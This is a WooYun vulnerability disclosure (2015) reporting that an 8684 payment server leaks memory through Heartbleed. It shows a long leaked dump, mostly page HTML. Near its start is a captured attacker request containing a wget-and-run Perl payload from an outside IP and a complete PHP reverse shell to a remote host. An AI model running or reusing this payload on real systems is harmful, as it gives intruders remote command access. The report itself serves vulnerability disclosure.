当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116910

漏洞标题:8684公交某支付系统服务器存在心脏出血

相关厂商:8684公交

漏洞作者: 路人甲

提交时间:2015-05-29 12:30

修复时间:2015-06-03 12:32

公开时间:2015-06-03 12:32

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-29: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

https://14.18.235.229直接跳转到
http://pay.8684.com/
14.18.235.229

[*] 14.18.235.229:443 - Printable info leaked: Ug;#R])#W'*X6If"!98532ED/A#g`B<XOiD=]L BLDt}`~Gh?2(q*(/'WV:YaJ|UzW<x9gfH=.+?yel\k5,2W=^%D1(iJ3tuO2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1Host: 122.13.69.71User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25Content-Type: application/x-www-form-urlencodedContent-Length: 2196Connection: close<?php system("wget 194.60.242.251/minispeedtest/speedtest/.z/hb/php06 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log &"); ?>set_time_limit(0);$ip = '91.121.105.21';$port = 22;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;if (function_exists('pcntl_fork')) {$pid = pcntl_fork();if ($pid == -1) {printit("ERROR: Can't fork");exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {printit("Error: Can't setsid()");exit(1);}$daemon = 1;} else {printit("WARNING: Failed to daemonise.");}chdir("/");umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {printit("$errstr ($errno)");exit(1);}$descriptorspec = array(   0 => array("pipe", "r"),   1 => array("pipe", "w"),   2 => array("pipe", "w"));$process = proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);while (1) {if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");$input = fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit ($string) {if (!$daemon) {print "$string";}}exit(1);?>!#GLg9></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/rxhzw"><img src="http://img.you.8684.com/zhuanti/game_86.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/rxhzw"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=rxhzw&c=2665_rxhzw" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/xajt"><img src="http://img.you.8684.com/zhuanti/game_187.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/xajt"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=xajt&c=2665_xajt" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/kdxy"><img src="http://img.you.8684.com/zhuanti/game_190.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/kdxy"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=kdxy&c=2665_kdxy" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/rxms"><img src="http://img.you.8684.com/zhuanti/game_193.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/rxms"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=rxms&c=2665_rxms" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/xxd"><img src="http://img.you.8684.com/zhuanti/game_118.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/xxd"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=xxd&c=2665_xxd" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/dbtx"><img src="http://img.you.8684.com/zhuanti/game_148.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/dbtx"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=dbtx&c=2665_dbtx" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/fyws"><img src="http://img.you.8684.com/zhuanti/game_178.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/fyws"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=fyws&c=2665_fyws" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/sgh"><img src="http://img.you.8684.com/zhuanti/game_112.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/sgh"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=sgh&c=2665_sgh" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/ly"><img src="http://img.you.8684.com/zhuanti/game_82.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/ly"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=ly&c=2665_ly" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/dwz"><img src="http://img.you.8684.com/zhuanti/game_160.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/dwz"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=dwz&c=2665_dwz" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/jzyf"><img src="http://img.you.8684.com/zhuanti/game_175.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/jzyf"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=jzyf&c=2665_jzyf" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/ct"><img src="http://img.you.8684.com/zhuanti/game_127.jpg" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/ct"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=ct&c=2665_ct" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/fsgj"><img src="http://img.you.8684.com/zhuanti/game_199.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/fsgj"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=fsgj&c=2665_fsgj" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/zm"><img src="http://img.you.8684.com/zhuanti/game_205.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/zm"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=zm&c=2665_zm" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/jzz"><img src="http://img.you.8684.com/zhuanti/game_208.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/jzz"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=jzz&c=2665_jzz" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/hwsg"><img src="http://img.you.8684.com/zhuanti/game_217.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/hwsg"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=hwsg&c=2665_hwsg" class="wf_mGmList__playBt"></a>  </p>  </li>  <li class="wf_mGmList__item">  <div class="wf_mGmList__pic">  <a href="/szwz"><img src="http://img.you.8684.com/zhuanti/game_220.png" /></a>  </div>  <p class="wf_mGmList__name clear">  <a href="/szwz"><strong></strong></a>  <a href="http://game1.8684.com/auto_reg.php?gname=szwz&c=2665_szwz" class="wf_mGmList__playBt"></a>  </p>  </li>  </ul>  </div>  <div class="otherGame contBox">  <div class="line"></div>  <div class="contBoxT"><span></span></div>  <ul class="clear"> <li >  <a href="/khbd" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_62.jpg" /><span></span></a></li>  <li >  <a href="/ly" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_82.jpg" /><span></span></a></li>  <li >  <a href="/wz" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_85.jpg" /><span></span></a></li>  <li >  <a href="/rxhzw" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_86.jpg" /><span></span></a></li>  <li >  <a href="/sxd" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_88.jpg" /><span></span></a></li>  <li >  <a href="/gcld" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_92.jpg" /><span></span></a></li>  <li >  <a href="/wy" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_96.jpg" /><span></span></a></li>  <li >  <a href="/rxsg2" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_97.jpg" /><span>2</span></a></li>  <li >  <a href="/tgzt" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_99.jpg" /><span></span></a></li>  <li >  <a href="/nslm" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_106.jpg" /><span></span></a></li>  <li >  <a href="/mlj" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_107.png" /><span></span></a></li>  <li >  <a href="/qs" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_109.jpg" /><span></span></a></li>  <li >  <a href="/2XF(#XF(#00ttp://img.you.8684.com/zhuanti/bg_112.png" /><span></span></a></li>  <li >  <a href="/xxd" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_118.jpg" /><span></span></a></li>  <li >  <a href="/ct" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_127.jpg" /><span></span></a></li>  <li >  <a href="/xfz" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_130.jpg" /><span></span></a></li>  <li >  <a href="/mhtj" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_133.jpg" /><span></span></a></li>  <li >  <a href="/jstm" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_136.jpg" /><span></span></a></li>  <li >  <a href="/ddh" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_142.jpg" /><span></span></a></li>  <li >  <a href="/dbtx" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_148.jpg" /><span></span></a></li>  <li >  <a href="/tcymll" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_151.jpg" /><span></span></a></li>  <li >  <a href="/dwz" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_160.jpg" /><span></span></a></li>  <li >  <a href="/zwx" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_163.jpg" /><span></span></a></li>  <li >  <a href="/slsg" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_166.jpg" /><span></span></a></li>  <li >  <a href="/hazg" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_169.jpg" /><span></span></a></li>  <li >  <a href="/ypsg" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_172.jpg" /><span></span></a></li>  <li >  <a href="/jzyf" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_175.png" /><span></span></a></li>  <li >  <a href="/fyws" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_178.png" /><span></span></a></li>  <li >  <a href="/zsl" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_181.png" /><span></span></a></li>  <li >  <a href="/dddx" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_184.png" /><span></span></a></li>  <li >  <a href="/xajt" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_187.jpg" /><span></span></a></li>  <li >  <a href="/kdxy" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_190.jpg" /><span></span></a></li>  <li >  <a href="/rxms" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_193.jpg" /><span></span></a></li>  <li >  <a href="/lysg" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_196.png" /><span></span></a></li>  <li >  <a href="/fsgj" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_199.png" /><span></span></a></li>  <li >  <a href="/zsglw" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_202.png" /><span></span></a></li>  <li >  <a href="/zm" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_205.png" /><span></span></a></li>  <li >  <a href="/jzz" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_208.png" /><span></span></a></li>  <li >  <a href="/zlbt" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_211.png" /><span></span></a></li>  <li >  <a href="/hgll" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_214.jpg" /><span></span></a></li>  <li >  <a href="/hwsg" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_217.jpg" /><span></span></a></li>  <li >  <a href="/szwz" target="_blank"><img src="http://img.you.8684.com/zhuanti/bg_220.png" /><span></span></a></li>  </ul>  </div>  </div> </div> <div class="mianBox3 clear">  <a href="http://game1.8684.com/auto_reg.php?gname=fyws&c=2620_fyws" title=""><img src="http://img.you.8684.com/rotation/1828.jpg" alt=""></a>  <a href="http://game1.8684.com/auto_reg.php?gname=xxd&c=2620_xxd" title=""><img src="http://img.you.8684.com/rotation/1621.jpg" alt=""></a>  <a href="http://game1.8684.com/nslm/?c=2620_nslm" title=""><img src="http://img.you.8684.com/rotation/1624.jpg" alt=""></a>  <a href="http://game1.8684.com/auto_reg.php?gname=hazg&c=2620_hazg" title=""><img src="http://img.you.8684.com/rotation/1627.png" alt=""></a>  </div>  <div class="mianBox2 contBox clear">  <div class="contBoxT"></div>  <div class="friendLinks clear">  <a href="http://you.8684.com/"></a> <a href="http://kaifu.8684.com/"></a> <a href="http://sxd.37wan.com/"></a> <a href="http://youxihe.49you.com/"></a> <a href="http://www.5336.com/">5336</a> <a href="http://www.kaifu.com/"></a> <a href="http://www.eeyy.com/">eeyy</a> <a href="http://www.521g.com/"></a> <a href="http://www.9k9k.com">9k9k</a> <a href="http://cycs.9377.com/"></a> <a href="http://kf.86wan.com/">86wan</a> <a href="http://www.264g.com/"></a> <a href="http://www.youkelai.com/"></a> <a href="http://kaifu.3145.com/">2013</a> <a href="http://hao.360.cn/">3@60</a> <a href="http://game.juxia.com/"></a> </div>  </div>  <script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"1","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"0","bdPos":"left","bdTop":"370"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script> </div> <div class="sl_footer"> <a href="http://you.8684.com/platform.html"></a> | <a href="http://you.8684.com/h_shangwu.html"></a><br />        <br />   [2012]0841-137 ICP11063314-3  B2-20120655  <a href="http://netadreg.gzaic.gov.cn/ntmm/WebSear/WebLogoPub.aspx?logo=440106106022011051600721" target="_blank" style="margin:0;"><img alt="" src="http://netadreg.gzaic.gov.cn/ntmm/default/images/logo_down.jpg" style="width:20px;"></a>  <a href="http://182.131.21.137/ccnt-apply/admin/business/preview/business-preview!lookUrlRFID.action?main_id=92668FFCEC96434DB043DD1B7FD1756F" target="_blank" style="margin:0;"><img src="http://img.you.8684.com/wan/images/gameRFID.png" style="width:20px;"></a><br /> </div> </body> <script src="http://2012.8684.com/tj.js"></script> <script type="text/javascript">    var sideAd = [['http://img.you.8684.com/zhuanti/recomm_cover_po4_43.png','http://game1.8684.com/auto_reg.php?gname=hazg&c=2620_hazg'],['http://img.you.8684.com/zhuanti/recomm_cover_po4_37.png','http://game1.8684.com/auto_reg.php?gname=zsglw&c=2620_zsglw']];</script> <script>var _hmt = _hmt || [];(function() {  var hm = document.createElement("script");  hm.src = "//hm.baidu.com/hm.js?209df5b6cbee46a2ce2de35075a37a0c";  var s = document.getElementsByTagName("script")[0];   s.parentNode.insertBefore(hm, s);})();</script> <script src="http://www.8684.com/js/code.js" charset="utf-8" type="text/javascript"></script> <script src="/c.php?id=9&c=page&item=16" type="text/javascript"></script> <script src="http://js.you.8684.com/wan/jquery-1.7.2.min.js" type="text/javascript"></script> <script src="http://js.you.8684.com/wan/wf_8684-1.3.1.js" type="text/javascript"></script> <script src="http://js.you.8684.com/wan/base.js?v23130902" type="text/javascript"></script> <script src="http://js.you.8684.com/wan/js.js?v20130902" type="text/javascript"></script> <script src="http://passport.8684.com/8684/js/passport.js?ver=1.1" type="text/javascript"></script> <script type="text/javascript" >    weiduanLinkSelf('_self');</script> <script type="text/javascript" id="nav_js"></script> <script type="text/javascript"> document.getElementById("nav_js").src = "http://passport.8684.com/8684/nav_v3.php?hide=1&ver=" + new Date().getTime();</script> <script>Sys_ad.ldad(948);</script> </html> x/42442" title="17">17</a> <span>[01-06]</span></li>  </ul>  </div>  </div> </div>   <div class="lan_banner"><a href="http://update0.8684.cn/8684gamecenter.rar" title="8684"><img src="http://img.you.8684.com/rotation/1618.jpg" style="width:980px;"/></a></div> <div class="mianBox2 clear ">  <div class="mianBox2L">    <div class="contBox">  <div class="contBoxT">    </div>  <div class="server_tab">  <a class="this"></a><a></a>  </div>  <table class="x-newkf">     <tr class="x-nlist">  <td>01-08</td>  <td>17:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 17:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 17:00:00 ">94</a></td>  </tr>  <tr class="x-nlist">  <td>01-08</td>  <td>15:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 15:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 15:00:00 ">408</a></td>  </tr>  <tr class="x-nlist">  <td>01-08</td>  <td>15:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 15:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 15:00:00 ">8</a></td>  </tr>  <tr class="x-nlist">  <td>01-08</td>  <td>14:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 14:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 14:00:00 ">9</a></td>  </tr>  <tr class="x-nlist">  <td>01-08</td>  <td>14:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 14:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 14:00:00 ">144</a></td>  </tr>  <tr class="x-nlist">  <td>01-08</td>  <td>12:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 12:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 12:00:00 ">50</a></td>  </tr>  <tr class="x-nlist">  <td>01-08</td>  <td>11:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 11:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 11:00:00 ">5</a></td>  </tr>  <tr class="x-nlist">  <td>01-08</td>  <td>11:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 11:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 11:00:00 ">67</a></td>  </tr>  <tr class="x-nlist">  <td>01-08</td>  <td>10:00</td>  <td><a href="javascript:alert('');" title="2015-01-08 10:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-08 10:00:00 ">76</a></td>  </tr>  </table>  <table class="x-newkf none">     <tr class="x-nlist">  <td>01-09</td>  <td>17:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 17:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 17:00:00 ">43</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>15:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 15:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 15:00:00 ">409</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>15:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 15:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 15:00:00 ">17</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>14:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 14:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 14:00:00 ">6</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>14:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 14:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 14:00:00 ">145</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>13:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 13:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 13:00:00 ">122</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>12:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 12:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 12:00:00 ">27</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>11:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 11:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 11:00:00 ">414</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>11:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 11:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 11:00:00 ">15</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>10:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 10:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 10:00:00 ">35</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>09:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-09 09:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 09:00:00 ">25</a>  </td>   </tr>  </table>  <a href="http://kaifu.8684.com/" class="ser_week"></a> </div> <div class="contBox">  <div class="contBoxT"></div>  <p class="kf_box">  8684-&nbsp;<a href="http://wpa.qq.com/msgrd?v=3&amp;uin=1804750951&amp;site=qq&amp;menu=yes" target="_blank"><img border="0" src="http://wpa.qq.com/pa?p=2:1804750951:41" alt="8684-" title="8684-"></a><br /> 8684-&nbsp;<a href="http://wpa.qq.com/msgrd?v=3&amp;uin=1246850593&amp;site=qq&amp;menu=yes" target="_blank"><img border="0" src="http://wpa.qq.com/pa?p=2:1246850593:41" alt="8684-" title="8684-"></a><br /> <span>020-85166710</span><br /> </p>  </div>  <div class="contBox u_Like">  <div class="contBoxT"></div>  <div class="Like_box"><a href="http://you.8684.com/zwx/server"><img src="http://img.you.8684.com/zhuanti/game_163.png" alt=" " /></a><a href="http://you.8684.com/zwx/server" class="Like_txt"> </a></div>  </div> <div class="contBox">  <div class="contBoxT"></div>  <div class="hotEvent clear">  <ul>  <li class="clear"><a href="/sgh/42514" title="18">18</a><span>01-07</span></li>  <li class="clear"><a href="/zsglw/43090" title="19">19</a><span>01-07</span></li>  <li class="clear"><a href="/sxd/34288" title="18">18</a><span>01-06</span></li>  <li class="clear"><a href="/zwx/42442" title="17">17</a><span>01-06</span></li>  <li class="clear"><a href="/sgh/42325" title="16">16</a><span>01-05</span></li>  <li class="clear"><a href="/rxsg2/42280" title="2">2</a><span>01-03</span></li>  <li class="clear"><a href="/sgh/42430" title="13">13</a><span>01-02</span></li>  <li class="clear"><a href="/rxsg2/38377" title="2">2</a><span>01-01</span></li>  <li class="clear"><a href="/ly/19392" title=""></a><span>12-31</span></li>  <li class="clear"><a href="/sgh/37387" title="11">11</a><span>12-31</span></li>  </ul>  </div>  </div>  <div class="contBox side_Ad">  <script>Sys_ad.ldad(771);</script>  </div>  <div class="contBox side_Ad">  <script>Sys_ad.ldad(772);</script>  </div>  </div>  <div class="mianBox2M">  <div class="hotGame contBox clear">  <div class="contBoxT"><span></span><span class="hotLink"><script>Sys_ad.ldad(955);</script></span></div>  <div class="indexGameDiv clear">  <a href="/rxsg2"><img src="http://img.you.8684.com/zhuanti/bg_97.jpg" class="gameImg" /></a>  <div class="indexGameDivR">  <a href="/rxsg2"><span class="gameName">2</span></a>  <p>  <a href="http://pay.8684.com/game/pay.php?game=97&server_id=90"></a>  <span>|</span>  <a href="/rxsg2/xinshouka"></a>  </p>  </p>  <div class="IGnweServerC clear">  <div class="IGnweServerT"></div>  <div class="IGnweServer">  <a href="/rxsg2/server/90">90</a><a href="/rxsg2/server/89">89</a> </div>  </div>  <div class="IGnweBt clear">  <a href="/rxsg2" class="newPlayerBtn noMarginr"></a>     <a href="http://game1.8684.com/auto_reg.php?gname=rxsg2&c=2665_rxsg2" class="gotoPlayBtn"></a>  </div>  </div>  </div>  <div class="indexGameDiv clear">  <a href="/hazg"><img src="http://img.you.8684.com/zhuanti/bg_169.jpg" class="gameImg" /></a>  <div class="indexGameDivR">  <a href="/hazg"><span class="gameName"></span></a>  <p>  <a href="http://pay.8684.com/game/pay.php?game=169&server_id=26"></a>  <span>|</span>  <a href="/hazg/xinshouka"></a>  <span>|</span>  <a href="http://res.wbly.hg.ate.cn/8684/client/hg.exe" class="red" ></a> </p>  </p>  <div class="IGnweServerC clear">  <div class="IGnweServerT"></div>  <div class="IGnweServer">  <a href="/hazg/server/26">26</a><a href="/hazg/server/25">25</a> </div>  </div>  <div class="IGnweBt clear">  <a href="/hazg" class="newPlayerBtn noMarginr"></a>     <a href="http://game1.8684.com/auto_reg.php?gname=hazg&c=2665_hazg" class="gotoPlayBtn"></a>  </div>  </div>  </div>  <div class="indexGameDiv clear">  <a href="/nslm"><img src="http://img.you.8684.com/zhuanti/bg_106.jpg" class="gameImg" /></a>  <div class="indexGameDivR">  <a href="/nslm"><span class="gameName"></span></a>  <p>  <a href="http://pay.8684.com/game/pay.php?game=106&server_id=143"></a>  <span>|</span>  <a href="/nslm/xinshouka"></a>  </p>  </p>  <div class="IGnweServerC clear">  <div class="IGnweServerT"></div>  <div class="IGnweServer">  <a href="/nslm/server/143">143</a><a href="/nslm/server/142">142</a> </div>  </div>  <div class="IGnweBt clear">  <a href="/nslm" class="newPlayerBtn noMarginr"></a>     <a href="http://game1.8684.com/auto_reg.php?gname=nslm&c=2665_nslm" class="gotoPlayBtn"></a>  </div>  </div>  </div>  <div class="indexGameDiv clear">  <a href="/sxd"><img src="http://img.you.8684.com/zhuanti/bg_88.jpg" class="gameImg" /></a>  <div class="indexGameDivR">  <a href="/sxd"><span class="gameName"></span></a>  <p>  <a href="http://pay.8684.com/game/pay.php?game=88&server_i@d=s75"></a>  <span>|</span>  <a href="/sxd/xinshouka"></a>  </p>  </p>  <div class="IGnweServerC clear">  <div class="IGnweServerT"></div>  <div class="IGnweServer">  <a href="/sxd/server/s75">75</a><a href="/sxd/server/s74">74</a> </div>  </div>  <div class="IGnweBt [email protected] XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv=X-UA-Compatiblecontent=IE=EmulateIE7 /> <title>___8684</title> <meta name="description" content="8684,,,,,,," media="screen" /> <base target="_blank"><link href="http://js.you.8684.com/wancss/base.css" type="text/css" rel="stylesheet" /> <script type="text/javascript" src="http://js.2011.8684.com/com/sys_ad_for_b.js"></script> <script src="http://js.you.8684.com/wan/jquery-1.7.2.min.js" type="text/javascript"></script> <script>Sys_ad.ldadarr(['771','772','955','948','1037']);</script> </head> <body> <div class="topbar" lazyload-loaded="loaded">  <div class="shell">  <div 